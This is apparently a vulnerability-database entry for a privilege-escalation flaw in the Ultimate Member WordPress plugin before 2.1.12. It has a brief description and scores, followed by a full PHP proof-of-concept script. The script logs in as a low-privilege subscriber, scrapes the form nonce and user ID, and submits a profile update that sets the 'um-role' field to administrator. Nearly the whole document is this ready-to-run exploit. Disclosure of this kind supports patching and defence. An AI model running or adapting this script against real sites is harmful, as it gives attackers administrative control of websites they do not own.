Ultimate Member < 2.1.12 - Authenticated Privilege Escalation via Profile Update

2020-11-0900:00:00

Chloe Chamberland

0.006 Low

EPSS

Percentile

78.8%

JSON

Due to the fact that Ultimate Member allowed the creation of new roles, this plugin also made it possible for site administrators to grant secondary Ultimate Member roles for all users upon a /wp-admin profile update.

<?php

// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
$name = $argv[4];
$lastname = $argv[5];
$nickname = $argv[6];
$email = $argv[7];

// 1) Log in as subscriber (with wp-admin access)
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'rememberme' => 'forever',
    'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Pull the Nonce
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/profile.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/_wpnonce"\svalue="([^"]+)"/', $content, $matches);
$nonce = $matches[1];

// Pull the user_id
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/profile.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

preg_match('/"checkuser_id"\svalue="([^"]+)"/', $content, $matches);
$user_id = $matches[1];

// Update Settings
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/profile.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
    '_wpnonce' => $nonce,
    '_wp_http_referer' => '%2Fwp-admin%2Fprofile.php',
    'from' => 'profile',
    'check_userid' => $user_id,
    'admin_bar_front' => '1',
    'first_name' => $name,
    'last_name' => $lastname,
    'nickname' => $nickname,
    'email' => $email,
    'url' => '',
    'description' => '',
    'pass1' => '',
    'pass2' => '',
    'um-role' => 'administrator',
    'action' => 'update',
    'user_id' => $user_id,
    'submit' => 'Update+Profile'

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

?>